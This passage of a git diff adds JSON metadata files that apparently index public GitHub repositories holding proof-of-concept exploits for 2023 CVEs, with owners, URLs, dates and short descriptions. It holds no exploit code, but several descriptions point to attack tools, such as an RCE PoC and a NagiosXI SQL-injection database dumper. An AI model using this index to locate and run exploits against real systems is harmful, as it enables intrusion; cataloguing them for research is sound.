"2024-09-06T10:00:28Z", + "pushed_at": "2024-01-27T10:39:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-47400", + "nagiosxi", + "proof-of-concept" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4741.json b/2023/CVE-2023-4741.json new file mode 100644 index 0000000000..a38d8210f0 --- /dev/null +++ b/2023/CVE-2023-4741.json @@ -0,0 +1,33 @@ +[ + { + "id": 681486230, + "name": "CVE-2023-4741", + "full_name": "wudidike\/CVE-2023-4741", + "owner": { + "login": "wudidike", + "id": 76437404, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76437404?v=4", + "html_url": "https:\/\/github.com\/wudidike", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wudidike\/CVE-2023-4741", + "description": null, + "fork": false, + "created_at": "2023-08-22T06:00:57Z", + "updated_at": "2023-09-05T03:34:39Z", + "pushed_at": "2023-09-05T03:34:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47437.json b/2023/CVE-2023-47437.json new file mode 100644 index 0000000000..e696b4709f --- /dev/null +++ b/2023/CVE-2023-47437.json @@ -0,0 +1,33 @@ +[ + { + "id": 719240166, + "name": "CVE-2023-47437", + "full_name": "herombey\/CVE-2023-47437", + "owner": { + "login": "herombey", + "id": 106621172, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106621172?v=4", + "html_url": "https:\/\/github.com\/herombey", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/herombey\/CVE-2023-47437", + "description": "Vulnerability Disclosure", + "fork": false, + "created_at": "2023-11-15T18:55:03Z", + "updated_at": "2023-11-22T16:17:44Z", + "pushed_at": "2023-11-16T16:32:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47459.json b/2023/CVE-2023-47459.json new file mode 100644 index 0000000000..573c4cef2b --- /dev/null +++ b/2023/CVE-2023-47459.json @@ -0,0 +1,33 @@ +[ + { + "id": 717109074, + "name": "CVE-2023-47459", + "full_name": "aleksey-vi\/CVE-2023-47459", + "owner": { + "login": "aleksey-vi", + "id": 65017000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65017000?v=4", + "html_url": "https:\/\/github.com\/aleksey-vi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aleksey-vi\/CVE-2023-47459", + "description": null, + "fork": false, + "created_at": "2023-11-10T15:20:48Z", + "updated_at": "2023-11-10T15:20:49Z", + "pushed_at": "2023-11-10T15:31:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47460.json b/2023/CVE-2023-47460.json new file mode 100644 index 0000000000..6f7c50c4f3 --- /dev/null +++ b/2023/CVE-2023-47460.json @@ -0,0 +1,33 @@ +[ + { + "id": 717115700, + "name": "CVE-2023-47460", + "full_name": "aleksey-vi\/CVE-2023-47460", + "owner": { + "login": "aleksey-vi", + "id": 65017000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65017000?v=4", + "html_url": "https:\/\/github.com\/aleksey-vi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aleksey-vi\/CVE-2023-47460", + "description": null, + "fork": false, + "created_at": "2023-11-10T15:38:01Z", + "updated_at": "2023-11-11T13:03:29Z", + "pushed_at": "2023-11-10T18:45:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47464.json b/2023/CVE-2023-47464.json new file mode 100644 index 0000000000..a97aa3513e --- /dev/null +++ b/2023/CVE-2023-47464.json @@ -0,0 +1,33 @@ +[ + { + "id": 757485554, + "name": "CVE-2023-47464", + "full_name": "HadessCS\/CVE-2023-47464", + "owner": { + "login": "HadessCS", + "id": 102136070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102136070?v=4", + "html_url": "https:\/\/github.com\/HadessCS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HadessCS\/CVE-2023-47464", + "description": "CVE-2023-47464 POC", + "fork": false, + "created_at": "2024-02-14T15:39:34Z", + "updated_at": "2024-02-27T15:19:30Z", + "pushed_at": "2024-02-14T15:43:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47488.json b/2023/CVE-2023-47488.json new file mode 100644 index 0000000000..4e8ba4d3d8 --- /dev/null +++ b/2023/CVE-2023-47488.json @@ -0,0 +1,33 @@ +[ + { + "id": 719187938, + "name": "CVE-2023-47488", + "full_name": "nitipoom-jar\/CVE-2023-47488", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-47488", + "description": null, + "fork": false, + "created_at": "2023-11-15T16:32:01Z", + "updated_at": "2023-11-15T16:47:44Z", + "pushed_at": "2023-11-15T16:47:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47489.json b/2023/CVE-2023-47489.json new file mode 100644 index 0000000000..892e82851e --- /dev/null +++ b/2023/CVE-2023-47489.json @@ -0,0 +1,33 @@ +[ + { + "id": 719177600, + "name": "CVE-2023-47489", + "full_name": "nitipoom-jar\/CVE-2023-47489", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-47489", + "description": null, + "fork": false, + "created_at": "2023-11-15T16:07:02Z", + "updated_at": "2023-11-15T16:26:32Z", + "pushed_at": "2023-11-15T16:48:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47504.json b/2023/CVE-2023-47504.json new file mode 100644 index 0000000000..56453ff324 --- /dev/null +++ b/2023/CVE-2023-47504.json @@ -0,0 +1,33 @@ +[ + { + "id": 817443436, + "name": "CVE-2023-47504-POC", + "full_name": "davidxbors\/CVE-2023-47504-POC", + "owner": { + "login": "davidxbors", + "id": 22767204, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22767204?v=4", + "html_url": "https:\/\/github.com\/davidxbors", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/davidxbors\/CVE-2023-47504-POC", + "description": null, + "fork": false, + "created_at": "2024-06-19T18:07:56Z", + "updated_at": "2024-06-23T13:34:47Z", + "pushed_at": "2024-06-19T18:54:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47529.json b/2023/CVE-2023-47529.json new file mode 100644 index 0000000000..1bceaf4540 --- /dev/null +++ b/2023/CVE-2023-47529.json @@ -0,0 +1,33 @@ +[ + { + "id": 718085174, + "name": "CVE-2023-47529", + "full_name": "RandomRobbieBF\/CVE-2023-47529", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-47529", + "description": "Cloud Templates & Patterns collection <= 1.2.2 - Sensitive Information Exposure via Log File", + "fork": false, + "created_at": "2023-11-13T10:50:25Z", + "updated_at": "2023-11-15T00:30:33Z", + "pushed_at": "2023-11-13T10:51:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47564.json b/2023/CVE-2023-47564.json new file mode 100644 index 0000000000..83deb82286 --- /dev/null +++ b/2023/CVE-2023-47564.json @@ -0,0 +1,37 @@ +[ + { + "id": 752666257, + "name": "CVE-2023-47564", + "full_name": "C411e\/CVE-2023-47564", + "owner": { + "login": "C411e", + "id": 35147719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35147719?v=4", + "html_url": "https:\/\/github.com\/C411e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C411e\/CVE-2023-47564", + "description": "CVE-2023-47564", + "fork": false, + "created_at": "2024-02-04T13:25:58Z", + "updated_at": "2024-02-05T08:16:00Z", + "pushed_at": "2024-02-05T08:20:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "hacking", + "pentesting" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4762.json b/2023/CVE-2023-4762.json new file mode 100644 index 0000000000..4ac6beb70f --- /dev/null +++ b/2023/CVE-2023-4762.json @@ -0,0 +1,64 @@ +[ + { + "id": 697220206, + "name": "CVE-2023-4762", + "full_name": "buptsb\/CVE-2023-4762", + "owner": { + "login": "buptsb", + "id": 666724, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/666724?v=4", + "html_url": "https:\/\/github.com\/buptsb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/buptsb\/CVE-2023-4762", + "description": null, + "fork": false, + "created_at": "2023-09-27T09:43:20Z", + "updated_at": "2024-10-28T17:29:04Z", + "pushed_at": "2023-09-27T10:39:47Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 27, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 697340903, + "name": "CVE-2023-4762-Code-Review", + "full_name": "sherlocksecurity\/CVE-2023-4762-Code-Review", + "owner": { + "login": "sherlocksecurity", + "id": 52328067, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52328067?v=4", + "html_url": "https:\/\/github.com\/sherlocksecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sherlocksecurity\/CVE-2023-4762-Code-Review", + "description": null, + "fork": false, + "created_at": "2023-09-27T14:29:43Z", + "updated_at": "2023-09-27T15:13:59Z", + "pushed_at": "2023-09-27T14:30:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47668.json b/2023/CVE-2023-47668.json new file mode 100644 index 0000000000..a9e644ef05 --- /dev/null +++ b/2023/CVE-2023-47668.json @@ -0,0 +1,64 @@ +[ + { + "id": 718515517, + "name": "CVE-2023-47668", + "full_name": "RandomRobbieBF\/CVE-2023-47668", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-47668", + "description": "Restrict Content <= 3.2.7 - Information Exposure via legacy log file", + "fork": false, + "created_at": "2023-11-14T08:40:49Z", + "updated_at": "2023-11-14T08:40:50Z", + "pushed_at": "2023-11-14T08:41:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 910957732, + "name": "CVE-2023-47668", + "full_name": "Nxploited\/CVE-2023-47668", + "owner": { + "login": "Nxploited", + "id": 188819918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188819918?v=4", + "html_url": "https:\/\/github.com\/Nxploited", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nxploited\/CVE-2023-47668", + "description": null, + "fork": false, + "created_at": "2025-01-01T22:42:41Z", + "updated_at": "2025-01-01T22:48:52Z", + "pushed_at": "2025-01-01T22:48:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4771.json b/2023/CVE-2023-4771.json new file mode 100644 index 0000000000..15db1f8502 --- /dev/null +++ b/2023/CVE-2023-4771.json @@ -0,0 +1,33 @@ +[ + { + "id": 812954720, + "name": "CVE-2023-4771", + "full_name": "sahar042\/CVE-2023-4771", + "owner": { + "login": "sahar042", + "id": 49879157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49879157?v=4", + "html_url": "https:\/\/github.com\/sahar042", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sahar042\/CVE-2023-4771", + "description": "CVE-2023-4771 PoC CKEditor 4 Cross-site scripting (XSS) vulnerability in AJAX sample", + "fork": false, + "created_at": "2024-06-10T08:19:24Z", + "updated_at": "2024-10-08T09:18:51Z", + "pushed_at": "2024-07-23T07:48:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47840.json b/2023/CVE-2023-47840.json new file mode 100644 index 0000000000..0893a227d7 --- /dev/null +++ b/2023/CVE-2023-47840.json @@ -0,0 +1,33 @@ +[ + { + "id": 725279708, + "name": "CVE-2023-47840", + "full_name": "RandomRobbieBF\/CVE-2023-47840", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-47840", + "description": "Qode Essential Addons <= 1.5.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation\/Activation", + "fork": false, + "created_at": "2023-11-29T20:14:39Z", + "updated_at": "2023-12-08T15:43:36Z", + "pushed_at": "2023-11-29T20:17:49Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47882.json b/2023/CVE-2023-47882.json new file mode 100644 index 0000000000..e00c9e32f9 --- /dev/null +++ b/2023/CVE-2023-47882.json @@ -0,0 +1,36 @@ +[ + { + "id": 714795483, + "name": "yi", + "full_name": "actuator\/yi", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/yi", + "description": "CVE-2023-47882 | CVE-2024-23727", + "fork": false, + "created_at": "2023-11-05T20:37:24Z", + "updated_at": "2024-03-24T16:26:09Z", + "pushed_at": "2024-03-24T16:16:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-47882", + "cve-2024-23727" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47883.json b/2023/CVE-2023-47883.json new file mode 100644 index 0000000000..9ffc93de48 --- /dev/null +++ b/2023/CVE-2023-47883.json @@ -0,0 +1,35 @@ +[ + { + "id": 692875423, + "name": "com.altamirano.fabricio.tvbrowser", + "full_name": "actuator\/com.altamirano.fabricio.tvbrowser", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.altamirano.fabricio.tvbrowser", + "description": "CVE-2023-47883", + "fork": false, + "created_at": "2023-09-17T21:01:22Z", + "updated_at": "2024-01-16T17:22:16Z", + "pushed_at": "2024-01-17T02:34:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-47883" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47889.json b/2023/CVE-2023-47889.json new file mode 100644 index 0000000000..e6ce473f53 --- /dev/null +++ b/2023/CVE-2023-47889.json @@ -0,0 +1,36 @@ +[ + { + "id": 712680513, + "name": "com.bdrm.superreboot", + "full_name": "actuator\/com.bdrm.superreboot", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.bdrm.superreboot", + "description": "CVE-2023-47889 | CVE-2023-47354", + "fork": false, + "created_at": "2023-11-01T00:57:11Z", + "updated_at": "2024-02-02T02:40:30Z", + "pushed_at": "2023-11-01T01:12:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-47354", + "cve-2023-47889" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4800.json b/2023/CVE-2023-4800.json new file mode 100644 index 0000000000..20a2827029 --- /dev/null +++ b/2023/CVE-2023-4800.json @@ -0,0 +1,33 @@ +[ + { + "id": 695846229, + "name": "CVE-2023-4800", + "full_name": "b0marek\/CVE-2023-4800", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4800", + "description": "Repository for CVE-2023-4800 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T12:11:58Z", + "updated_at": "2023-09-24T12:11:59Z", + "pushed_at": "2023-09-24T12:18:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48022.json b/2023/CVE-2023-48022.json new file mode 100644 index 0000000000..d1fbace920 --- /dev/null +++ b/2023/CVE-2023-48022.json @@ -0,0 +1,64 @@ +[ + { + "id": 741317419, + "name": "CVE-2023-48022", + "full_name": "0x656565\/CVE-2023-48022", + "owner": { + "login": "0x656565", + "id": 84010223, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84010223?v=4", + "html_url": "https:\/\/github.com\/0x656565", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x656565\/CVE-2023-48022", + "description": "CVE-2023-48022 exploit modified from Bishop Fox work", + "fork": false, + "created_at": "2024-01-10T06:26:01Z", + "updated_at": "2024-03-28T17:24:01Z", + "pushed_at": "2024-01-10T06:33:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 779214530, + "name": "ShadowRay-RCE-PoC-CVE-2023-48022", + "full_name": "jakabakos\/ShadowRay-RCE-PoC-CVE-2023-48022", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/ShadowRay-RCE-PoC-CVE-2023-48022", + "description": "ShadowRay RCE POC (CVE-2023-48022)", + "fork": false, + "created_at": "2024-03-29T09:54:31Z", + "updated_at": "2024-11-13T11:55:02Z", + "pushed_at": "2024-04-02T06:35:40Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48028.json b/2023/CVE-2023-48028.json new file mode 100644 index 0000000000..12cc79b029 --- /dev/null +++ b/2023/CVE-2023-48028.json @@ -0,0 +1,33 @@ +[ + { + "id": 719728314, + "name": "CVE-2023-48028", + "full_name": "nitipoom-jar\/CVE-2023-48028", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48028", + "description": null, + "fork": false, + "created_at": "2023-11-16T19:22:30Z", + "updated_at": "2023-12-07T17:11:21Z", + "pushed_at": "2023-11-16T19:32:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48029.json b/2023/CVE-2023-48029.json new file mode 100644 index 0000000000..102750ce61 --- /dev/null +++ b/2023/CVE-2023-48029.json @@ -0,0 +1,33 @@ +[ + { + "id": 719714263, + "name": "CVE-2023-48029", + "full_name": "nitipoom-jar\/CVE-2023-48029", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48029", + "description": null, + "fork": false, + "created_at": "2023-11-16T18:42:12Z", + "updated_at": "2023-11-16T19:01:29Z", + "pushed_at": "2023-11-16T19:30:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48031.json b/2023/CVE-2023-48031.json new file mode 100644 index 0000000000..636a6a8149 --- /dev/null +++ b/2023/CVE-2023-48031.json @@ -0,0 +1,33 @@ +[ + { + "id": 719696300, + "name": "CVE-2023-48031", + "full_name": "nitipoom-jar\/CVE-2023-48031", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48031", + "description": null, + "fork": false, + "created_at": "2023-11-16T17:57:20Z", + "updated_at": "2023-11-16T18:00:09Z", + "pushed_at": "2023-11-16T18:00:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48034.json b/2023/CVE-2023-48034.json new file mode 100644 index 0000000000..da3b26fcaa --- /dev/null +++ b/2023/CVE-2023-48034.json @@ -0,0 +1,33 @@ +[ + { + "id": 721226835, + "name": "CVE-2023-48034", + "full_name": "aprkr\/CVE-2023-48034", + "owner": { + "login": "aprkr", + "id": 70669787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70669787?v=4", + "html_url": "https:\/\/github.com\/aprkr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aprkr\/CVE-2023-48034", + "description": "Weak encryption in Acer Wireless Keyboard SK-9662 allows attacker in physical proximity to both decrypt wireless keystrokes and inject wireless arbitrary keystrokes.", + "fork": false, + "created_at": "2023-11-20T16:04:24Z", + "updated_at": "2023-11-22T14:05:37Z", + "pushed_at": "2023-11-20T18:40:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48084.json b/2023/CVE-2023-48084.json new file mode 100644 index 0000000000..75cdab59a6 --- /dev/null +++ b/2023/CVE-2023-48084.json @@ -0,0 +1,64 @@ +[ + { + "id": 765513024, + "name": "CVE-2023-48084", + "full_name": "Hamibubu\/CVE-2023-48084", + "owner": { + "login": "Hamibubu", + "id": 108554878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108554878?v=4", + "html_url": "https:\/\/github.com\/Hamibubu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hamibubu\/CVE-2023-48084", + "description": "Python program to dump all the databases, exploiting NagiosXI sqli vulnerability", + "fork": false, + "created_at": "2024-03-01T04:06:15Z", + "updated_at": "2024-03-22T22:48:59Z", + "pushed_at": "2024-03-01T04:22:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 776233003, + "name": "CVE-2023-48084", + "full_name": "bucketcat\/CVE-2023-48084", + "owner": { + "login": "bucketcat", + "id": 91589201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91589201?v=4", + "html_url": "https:\/\/github.com\/bucketcat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bucketcat\/CVE-2023-48084", + "description": "Fixes broken syntax in the POC, automates the API_Token retrieval, stores the token as a variable and pipes into the fixed POC.", + "fork": false, + "created_at": "2024-03-23T00:31:37Z", + "updated_at": "2024-03-23T01:16:32Z", + "pushed_at": "2024-03-23T04:00:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48104.json b/2023/CVE-2023-48104.json new file mode 100644 index 0000000000..762803239f --- /dev/null +++ b/2023/CVE-2023-48104.json @@ -0,0 +1,33 @@ +[ + { + 